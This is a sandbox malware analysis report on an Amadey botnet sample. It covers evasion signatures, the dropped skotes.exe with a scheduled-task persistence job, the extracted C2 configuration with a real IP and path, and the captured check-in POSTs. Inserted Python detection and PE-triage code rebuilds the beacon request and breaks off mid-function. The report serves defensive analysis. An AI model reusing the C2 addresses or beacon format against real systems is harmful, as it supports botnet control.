
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561043
MD5: 9ddbac8aaba1c5bb2f9a22717a60a6ba
SHA1: 16712810fcf1bb9c7f1940af8e2e59b92f4a7b65
SHA256: edec375a0ef3ce9e3067aa661e9e32fee7cba13ff4f3c7ab69d6db8d7b22b03d
Tags: exe, user-Bitsight

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9DDBAC8AABA1C5BB2F9A22717A60A6BA)
    • skotes.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 9DDBAC8AABA1C5BB2F9A22717A60A6BA)
  • skotes.exe (PID: 7772 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9DDBAC8AABA1C5BB2F9A22717A60A6BA)
  • skotes.exe (PID: 8076 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9DDBAC8AABA1C5BB2F9A22717A60A6BA)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Yara matches (memory dumps): Source | Rule | Description | Author
Source: 00000002.00000002.1497759494.0000000000721000.00000040.00000001.01000000.00000007.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000000.00000003.1423354567.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000003.00000003.1466497850.0000000004F20000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000002.00000003.1457117559.00000000049A0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Yara matches (unpacked PE files): Source | Rule | Description | Author
Source: 3.2.skotes.exe.720000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 5.2.skotes.exe.720000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 2.2.skotes.exe.720000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 0.2.file.exe.4f0000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security

No Sigma rule has matched

Suricata IDS alert: Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
Timestamp: 2024-11-22T17:13:25.472364+0100 | SID: 2856147 | Severity: 1 | Classtype: A Network Trojan was detected | Source IP: 192.168.2.8 | Source Port: 49714 | Destination IP: 185.215.113.43 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedH | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php% | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/8 | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpE | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedo | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000002.00000002.1497759494.0000000000721000.00000040.00000001.01000000.00000007.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49714 -> 185.215.113.43:80
Source: Malware configuration extractor | IPs: 185.215.113.43
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 156 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: Joe Sandbox View | IP Address: 185.215.113.43
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0072BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,5_2_0072BE30
Source: unknown | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/8
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php%
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpE
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpZ
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedH
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedo
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpp
                    Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpy
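The check-in above is a four-byte urlencoded POST to /index.php with the host given as a bare IP (which is why the TCP connections have no preceding DNS query), and the same C2 URL is carved from skotes.exe memory many times with trailing junk because the string extractor runs past the terminator. The following Python turns those observations into IOCs and a wire-level match. It is an added example, not part of the Joe Sandbox report or of the sample: the request bytes and the string list are reconstructed from the lines above, and the body pattern used for the "tiny status body" trait is an assumption.

```python
"""IOC extraction and a wire-level match for the Amadey-style check-in seen above.
Added example: not part of the Joe Sandbox report or of the sample."""
import re
from urllib.parse import urlsplit

# Constructed from the "String found in binary or memory" lines above: the URL
# is carved from process memory, so the same C2 path shows up with trailing
# junk ('%', 'ncodedH', ...) and once as a truncated overwrite ('/8').
MEMORY_STRINGS = [
    "http://185.215.113.43/8",
    "http://185.215.113.43/Zu7JuNko/index.php",
    "http://185.215.113.43/Zu7JuNko/index.php%",
    "http://185.215.113.43/Zu7JuNko/index.phpncodedH",
    "http://185.215.113.43/Zu7JuNko/index.phpy",
]

# Constructed request bytes, reassembled from the headers and body shown above.
BEACON = (b"POST /Zu7JuNko/index.php HTTP/1.1\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Host: 185.215.113.43\r\n"
          b"Content-Length: 4\r\n"
          b"Cache-Control: no-cache\r\n"
          b"\r\n"
          b"st=s")

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IPV4_RE = re.compile(r"(\d{1,3}\.){3}\d{1,3}")


def canonical_c2_urls(strings):
    """Collapse carved fragments onto scheme://host/path-up-to-.php; fragments
    with no script path (the '/8' line) are dropped as partial overwrites."""
    urls = set()
    for s in strings:
        for m in URL_RE.finditer(s):
            u = urlsplit(m.group(0))
            cut = u.path.find(".php")
            if cut == -1:
                continue
            urls.add(f"{u.scheme}://{u.netloc}{u.path[:cut + 4]}")
    return sorted(urls)


def parse_http_request(raw: bytes):
    """Minimal HTTP/1.1 request parser: (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def beacon_indicators(raw: bytes) -> dict:
    """Each trait of the observed check-in as a separate boolean, so a detection
    can weight them instead of matching one brittle string."""
    method, target, headers, body = parse_http_request(raw)
    host = headers.get("host", "")
    return {
        "post_to_index_php": method == "POST" and target.endswith("/index.php"),
        "form_urlencoded": headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"),
        "host_is_bare_ip": IPV4_RE.fullmatch(host) is not None,  # no DNS needed
        "no_user_agent": "user-agent" not in headers,             # none listed above
        # Assumed shape of the first-stage body: a 1..3 letter key and a tiny value.
        "tiny_status_body": re.fullmatch(rb"[a-z]{1,3}=[A-Za-z0-9]{1,8}", body) is not None,
    }


def is_amadey_beacon(raw: bytes) -> bool:
    """True only when every trait matches; loosen to a score for production use."""
    return all(beacon_indicators(raw).values())
```

Feed `canonical_c2_urls` the output of `strings` on the .sdmp memory dumps and `beacon_indicators` a reassembled request from the PCAP; the separate booleans matter because a bare-IP Host header alone is common in legitimate telemetry, while the combination with no User-Agent and a four-byte urlencoded body is not.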

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name: .idata
Source: skotes.exe.0.dr | Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_00768860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_00767049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_007678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0072E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_00762D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_00724DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_007631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_00724B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_00757F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0076779B
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9983874744550408
Source: file.exe | Static PE information: Section: hockpqtz ZLIB complexity 0.9949597149776453
Source: skotes.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9983874744550408
Source: skotes.exe.0.dr | Static PE information: Section: hockpqtz ZLIB complexity 0.9949597149776453
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: file.exe | Static file information: File size 1922048 > 1048576
Source: file.exe | Static PE information: Raw size of hockpqtz is bigger than: 0x100000 < 0x1a3600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.4f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 2.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 3.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 5.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1dbb1f should be: 0x1dfa51
Source: skotes.exe.0.dr | Static PE information: real checksum: 0x1dbb1f should be: 0x1dfa51
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: hockpqtz
Source: file.exe | Static PE information: section name: wxulotut
Source: file.exe | Static PE information: section name: .taggant
Source: skotes.exe.0.dr | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name: .idata
Source: skotes.exe.0.dr | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name: hockpqtz
Source: skotes.exe.0.dr | Static PE information: section name: wxulotut
Source: skotes.exe.0.dr | Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0073D91C push ecx; ret 5_2_0073D92F
Source: file.exe | Static PE information: section name: entropy: 7.988291086573797
Source: file.exe | Static PE information: section name: hockpqtz entropy: 7.955305476537546
Source: skotes.exe.0.dr | Static PE information: section name: entropy: 7.988291086573797
Source: skotes.exe.0.dr | Static PE information: section name: hockpqtz entropy: 7.955305476537546
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
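The static indicators listed above for file.exe and skotes.exe (section entropy close to 8, ZLIB complexity close to 1.0, the entry point inside the non-standard .taggant section, and a stored PE checksum that does not match the file) can be reproduced with a few dozen lines and no sandbox. The script below is an added example, not Joe Sandbox code: it parses a PE32 header with `struct` only and computes each indicator. Because the sample itself is not on this page, it builds a constructed PE in memory with the same section names and the stale CheckSum value quoted in the report, so the values it returns describe that constructed file, not file.exe.

```python
"""Static PE triage for the four indicators the report above lists: section entropy,
zlib complexity, entry-point section and PE checksum. Added example, not Joe Sandbox code."""
import hashlib
import math
import struct
import zlib

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 is the maximum)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed size over raw size; packed or encrypted data stays near 1.0."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """IMAGE_NT_HEADERS.CheckSum as computed by imagehlp: 32-bit one's-complement
    style folding of every dword except the CheckSum field, plus the file length."""
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage(data: bytes) -> dict:
    """Parse a PE32 image and return the indicators a sandbox report lists for it."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    assert data[e_lfanew:e_lfanew + 4] == b"PE\0\0", "not a PE file"
    num_sections, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24                                  # IMAGE_OPTIONAL_HEADER
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    stored_sum, = struct.unpack_from("<I", data, opt + 64)
    sections = []
    for i in range(num_sections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        body = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": max(vsize, rawsize), "entropy": entropy(body),
                         "zlib": zlib_complexity(body)})
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry_rva < s["va"] + s["vsize"]), None)
    return {"sections": sections,
            "entry_section": entry_section,
            "entry_outside_standard": entry_section not in STANDARD_SECTIONS,
            "checksum_ok": stored_sum == pe_checksum(data, opt + 64),
            "packed": [s["name"] for s in sections if s["entropy"] > 7.5]}


def fix_checksum(data: bytes) -> bytes:
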